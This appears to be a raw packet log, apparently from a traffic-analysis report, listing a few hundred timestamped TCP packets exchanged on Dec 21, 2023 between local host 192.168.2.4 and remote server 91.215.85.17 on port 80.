                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211616039 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211642027 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211656094 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211680889 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211718082 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211755037 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211930990 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211945057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.211987019 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212018013 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212059975 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212101936 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212109089 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212140083 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212146997 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212289095 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212332010 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212392092 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212469101 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212510109 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212560892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212574959 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212613106 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212677002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212713957 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.212976933 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213109970 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213154078 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213202000 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213319063 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213331938 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213362932 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213372946 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213398933 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213452101 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213480949 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213515043 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213517904 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213551998 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213604927 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213641882 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213681936 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213717937 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213741064 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213774920 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213814974 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213815928 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213850021 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213895082 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213943958 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.213984013 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214013100 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214114904 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214152098 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214170933 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214199066 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214210033 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214229107 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214291096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214329004 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214437962 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214508057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214549065 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214569092 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214605093 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214675903 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214756012 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214793921 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214845896 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214957952 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.214998007 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.215028048 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.215064049 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.215115070 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.215179920 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.215219021 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.215250015 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.215352058 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.215389967 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.215799093 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.215872049 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.215912104 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.215959072 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.215995073 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.216128111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.216300011 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.216312885 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.216341019 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.216358900 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.216382027 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.216487885 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.216526985 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.216556072 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.216643095 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.216682911 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.216713905 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.216752052 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.216797113 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.216890097 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.216928959 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.217026949 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.217097998 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.217140913 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.217175961 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.217214108 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.217255116 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.217381001 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.217420101 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.217556953 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.217588902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.217628956 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.217658997 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.217698097 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.217715979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.217799902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.217833996 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.218311071 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.218458891 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.218499899 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.218611956 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.218641996 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.218652964 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.218698978 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.218791008 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.218844891 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.218877077 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.218938112 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.218990088 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219023943 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219063044 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219118118 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219208002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219244957 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219244957 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219299078 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219429016 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219464064 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219523907 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219561100 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219619989 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219664097 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219712019 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219808102 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219820023 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219844103 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.219891071 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220108986 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220154047 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220290899 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220328093 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220369101 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220415115 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220454931 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220485926 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220566034 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220606089 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220680952 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220834017 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220875978 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220896959 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220927000 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220937967 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.220963955 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221002102 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221015930 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221029043 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221048117 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221065044 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221066952 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221079111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221107960 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221115112 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221117973 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221138000 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221157074 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221170902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221178055 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221201897 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221205950 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221225023 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221246004 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221266031 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221281052 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221299887 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221323013 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221330881 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221349001 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221366882 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221379042 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221389055 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221404076 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221411943 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221429110 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221441984 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221468925 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221498013 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221537113 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221579075 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221621037 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221633911 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221663952 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221697092 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221709967 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221729040 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221746922 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221751928 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221760035 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221762896 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221786976 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221790075 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221795082 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221822023 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221832991 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221858978 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221879005 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221894979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221918106 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221930027 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221935987 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221947908 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221982956 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.221986055 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222191095 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222229004 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222235918 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222261906 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222278118 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222527981 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222560883 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222599030 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222600937 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222636938 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222677946 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222700119 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222739935 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222740889 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222827911 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222840071 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222870111 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222877979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222892046 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222924948 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222930908 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222930908 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222975969 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.222995043 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223012924 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223016024 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223027945 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223027945 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223051071 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223058939 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223066092 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:33.223104954 CET804973891.215.85.17192.168.2.4
